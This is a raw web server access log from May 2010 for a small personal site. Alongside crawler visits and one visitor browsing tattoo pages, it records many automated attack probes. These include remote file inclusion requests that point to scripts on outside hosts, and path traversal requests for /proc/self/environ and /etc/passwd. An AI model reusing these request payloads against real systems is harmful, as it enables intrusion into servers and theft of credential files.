114.141.2.7 - - [03/May/2010:11:06:26 -0500] "GET /logs/access_log.1262304000//skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
114.141.2.7 - - [03/May/2010:11:06:26 -0500] "GET //skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
114.141.2.7 - - [03/May/2010:11:06:26 -0500] "GET /logs/access_log.1262390400//skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
87.250.255.243 - - [03/May/2010:11:06:54 -0500] "GET /logs/access_log.1221177600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.18.166 - - [03/May/2010:11:19:43 -0500] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:11:19:43 -0500] "GET /logs/access_log.1268611200%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:11:19:43 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:11:19:56 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:11:19:56 -0500] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:11:19:56 -0500] "GET /logs/access_log.1268611200%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:11:25:51 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:11:25:51 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:11:25:51 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
216.129.119.14 - - [03/May/2010:11:29:16 -0500] "GET /logs/access_log.1217980800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.13.92 - - [03/May/2010:11:29:24 -0500] "GET /logs/access_log.1178582400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.44 - - [03/May/2010:11:32:17 -0500] "GET /logs/access_log.1242518400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.45.185.178 - - [03/May/2010:11:32:23 -0500] "GET /ages/pageHeader.php?path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:11:32:23 -0500] "GET /logs/access_log.1264550400/ages/pageHeader.php?path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:11:32:23 -0500] "GET /logs/ages/pageHeader.php?path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:11:36:34 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:11:36:34 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:11:36:34 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
212.175.146.45 - - [03/May/2010:11:38:53 -0500] "GET /logs/access_log.1268611200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.76"
212.175.146.45 - - [03/May/2010:11:38:54 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.76"
212.175.146.45 - - [03/May/2010:11:38:54 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.76"
210.125.133.87 - - [03/May/2010:11:40:52 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://yudep.yongin.ac.kr/~munbo/gboard/data/scan/gore/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
210.125.133.87 - - [03/May/2010:11:40:52 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://yudep.yongin.ac.kr/~munbo/gboard/data/scan/gore/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
210.125.133.87 - - [03/May/2010:11:40:52 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://yudep.yongin.ac.kr/~munbo/gboard/data/scan/gore/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:11:41:58 -0500] "GET /logs/?loadpage=http://enniskillengaa.com//id1.txt? HTTP/1.1" 200 4114 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:11:41:58 -0500] "GET /logs/access_log.1225238400/?loadpage=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:11:41:58 -0500] "GET /?loadpage=http://enniskillengaa.com//id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:11:41:59 -0500] "GET /?loadpage=http://enniskillengaa.com//id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:11:41:59 -0500] "GET /logs/access_log.1225238400/?loadpage=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:11:41:59 -0500] "GET /logs/?loadpage=http://enniskillengaa.com//id1.txt? HTTP/1.1" 200 4114 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:11:42:03 -0500] "GET /logs/access_log.1263427200/?loadpage=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
99.39.2.249 - - [03/May/2010:11:44:40 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
99.39.2.249 - - [03/May/2010:11:44:40 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.218.116.134 - - [03/May/2010:11:45:27 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.195.112.180 - - [03/May/2010:11:46:48 -0500] "GET /logs/access_log.1238284800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
187.45.193.159 - - [03/May/2010:11:49:48 -0500] "GET /logs/access_log.1270684800//index.php?option=com_ownbiblio&view=catalogue&catid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
187.45.193.159 - - [03/May/2010:11:49:48 -0500] "GET //index.php?option=com_ownbiblio&view=catalogue&catid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
187.45.193.159 - - [03/May/2010:11:49:49 -0500] "GET /logs//index.php?option=com_ownbiblio&view=catalogue&catid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
187.45.193.159 - - [03/May/2010:11:49:57 -0500] "GET /logs/access_log.1270684800//index.php?option=com_ownbiblio&view=catalogue&catid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
187.45.193.159 - - [03/May/2010:11:49:57 -0500] "GET //index.php?option=com_ownbiblio&view=catalogue&catid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
187.45.193.159 - - [03/May/2010:11:49:58 -0500] "GET /logs//index.php?option=com_ownbiblio&view=catalogue&catid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.96.90.170 - - [03/May/2010:11:59:28 -0500] "GET /logs/access_log.1270684800//index.php?option=com_ownbiblio&view=catalogue&catid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
82.96.90.170 - - [03/May/2010:11:59:28 -0500] "GET //index.php?option=com_ownbiblio&view=catalogue&catid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.96.90.170 - - [03/May/2010:11:59:29 -0500] "GET /logs//index.php?option=com_ownbiblio&view=catalogue&catid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
216.129.119.42 - - [03/May/2010:12:00:25 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.195.112.180 - - [03/May/2010:12:01:15 -0500] "GET /logs/access_log.1208908800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.96.90.170 - - [03/May/2010:12:04:59 -0500] "GET /logs/access_log.1270684800//index.php?option=com_ownbiblio&view=catalogue&catid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
82.96.90.170 - - [03/May/2010:12:04:59 -0500] "GET //index.php?option=com_ownbiblio&view=catalogue&catid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.96.90.170 - - [03/May/2010:12:04:59 -0500] "GET /logs//index.php?option=com_ownbiblio&view=catalogue&catid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
99.39.2.249 - - [03/May/2010:12:05:53 -0500] "GET /index.php?option=base_datapath&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.218.116.131 - - [03/May/2010:12:07:14 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.130 - - [03/May/2010:12:08:27 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.195.112.180 - - [03/May/2010:12:08:43 -0500] "GET /logs/access_log.1264896000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.36 - - [03/May/2010:12:09:05 -0500] "GET /logs/access_log.1226448000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.204.240 - - [03/May/2010:12:10:25 -0500] "GET /logs/access_log.1166054400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
99.39.2.249 - - [03/May/2010:12:11:46 -0500] "GET /logs/access_log.1218499200/index.php?option=base_datapath&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
99.39.2.249 - - [03/May/2010:12:11:46 -0500] "GET /index.php?option=base_datapath&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
99.39.2.249 - - [03/May/2010:12:11:46 -0500] "GET /logs/index.php?option=base_datapath&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.218.116.132 - - [03/May/2010:12:12:56 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.174.185.131 - - [03/May/2010:12:14:32 -0500] "GET /logs/access_log.1264118400/index.php?menu=deti&page=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.174.185.131 - - [03/May/2010:12:14:32 -0500] "GET /index.php?menu=deti&page=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.174.185.131 - - [03/May/2010:12:14:32 -0500] "GET /logs/access_log.1251504000/index.php?menu=deti&page=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.174.185.131 - - [03/May/2010:12:14:32 -0500] "GET /logs/index.php?menu=deti&page=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.218.116.166 - - [03/May/2010:12:15:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.43 - - [03/May/2010:12:17:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
99.39.2.249 - - [03/May/2010:12:17:52 -0500] "GET /logs/index.php?option=com_juser&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
99.39.2.249 - - [03/May/2010:12:17:52 -0500] "GET /index.php?option=com_juser&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.218.116.162 - - [03/May/2010:12:18:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
151.1.253.1 - - [03/May/2010:12:19:44 -0500] "GET /logs/access_log.1270857600/index.php?meio.php=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
151.1.253.1 - - [03/May/2010:12:19:44 -0500] "GET /index.php?meio.php=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
151.1.253.1 - - [03/May/2010:12:19:44 -0500] "GET /logs/index.php?meio.php=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.218.116.133 - - [03/May/2010:12:23:19 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.14 - - [03/May/2010:12:23:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.43 - - [03/May/2010:12:24:04 -0500] "GET /logs/access_log.1246665600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.172.232.251 - - [03/May/2010:12:25:13 -0500] "GET /logs/access_log.1270857600/index.php?meio.php=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.172.232.251 - - [03/May/2010:12:25:14 -0500] "GET /index.php?meio.php=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
211.172.232.251 - - [03/May/2010:12:25:14 -0500] "GET /logs/index.php?meio.php=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
212.241.177.123 - - [03/May/2010:12:25:33 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
212.241.177.123 - - [03/May/2010:12:25:33 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
212.241.177.123 - - [03/May/2010:12:25:33 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
216.129.119.13 - - [03/May/2010:12:27:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
115.68.20.197 - - [03/May/2010:12:28:28 -0500] "GET /logs/access_log.1270857600/index.php?meio.php=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
115.68.20.197 - - [03/May/2010:12:28:30 -0500] "GET /index.php?meio.php=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
115.68.20.197 - - [03/May/2010:12:28:31 -0500] "GET /logs/index.php?meio.php=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.199.188 - - [03/May/2010:12:29:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.241.177.123 - - [03/May/2010:12:30:52 -0500] "GET /logs/access_log.1268611200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
216.129.119.40 - - [03/May/2010:12:31:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.71.36 - - [03/May/2010:12:31:28 -0500] "GET /logs/access_log.1242518400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.218.116.164 - - [03/May/2010:12:31:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
193.105.206.194 - - [03/May/2010:12:32:04 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
193.105.206.194 - - [03/May/2010:12:32:04 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
193.105.206.194 - - [03/May/2010:12:32:04 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
193.105.206.194 - - [03/May/2010:12:33:19 -0500] "GET /logs/access_log.1217808000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
207.46.199.41 - - [03/May/2010:12:33:25 -0500] "GET /logs/access_log.1198368000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.41 - - [03/May/2010:12:33:26 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.204.196 - - [03/May/2010:12:33:54 -0500] "GET /logs/access_log.1193356800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.105.206.194 - - [03/May/2010:12:35:11 -0500] "GET /logs/access_log.1268611200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
216.129.119.12 - - [03/May/2010:12:35:40 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.165 - - [03/May/2010:12:39:38 -0500] "GET /logs/access_log.1238544000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.165 - - [03/May/2010:12:40:53 -0500] "GET /logs/access_log.1242604800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.165 - - [03/May/2010:12:47:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
125.244.25.10 - - [03/May/2010:12:47:23 -0500] "GET //microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.79"
207.45.185.178 - - [03/May/2010:12:48:34 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:12:48:34 -0500] "GET /logs/access_log.1270598400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:12:48:34 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:12:48:43 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:12:48:43 -0500] "GET /logs/access_log.1270598400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:12:48:43 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:12:48:52 -0500] "GET /logs/access_log.1268956800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.45.185.178 - - [03/May/2010:12:48:55 -0500] "GET /logs/access_log.1268956800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
187.45.193.159 - - [03/May/2010:12:53:11 -0500] "GET /logs/index1.php?choix=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
187.45.193.159 - - [03/May/2010:12:53:11 -0500] "GET /index1.php?choix=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
187.45.193.159 - - [03/May/2010:12:53:13 -0500] "GET /logs/index1.php?choix=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
187.45.193.159 - - [03/May/2010:12:53:14 -0500] "GET /index1.php?choix=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
187.45.193.159 - - [03/May/2010:12:54:04 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
187.45.193.159 - - [03/May/2010:12:54:06 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.249.71.36 - - [03/May/2010:12:54:09 -0500] "GET /logs/access_log.1249948800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.115.111.248 - - [03/May/2010:12:55:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
216.129.119.11 - - [03/May/2010:12:56:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.163 - - [03/May/2010:12:57:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.44 - - [03/May/2010:13:04:51 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
84.29.106.123 - - [03/May/2010:13:08:28 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.nl/search?sourceid=navclient&ie=UTF-8&rlz=1T4SUNA_enNL269NL269&q=vintage+bert+grimm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; AskTB5.6)"
84.29.106.123 - - [03/May/2010:13:08:28 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; AskTB5.6)"
84.29.106.123 - - [03/May/2010:13:08:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; AskTB5.6)"
84.29.106.123 - - [03/May/2010:13:08:36 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; AskTB5.6)"
84.29.106.123 - - [03/May/2010:13:08:36 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; AskTB5.6)"
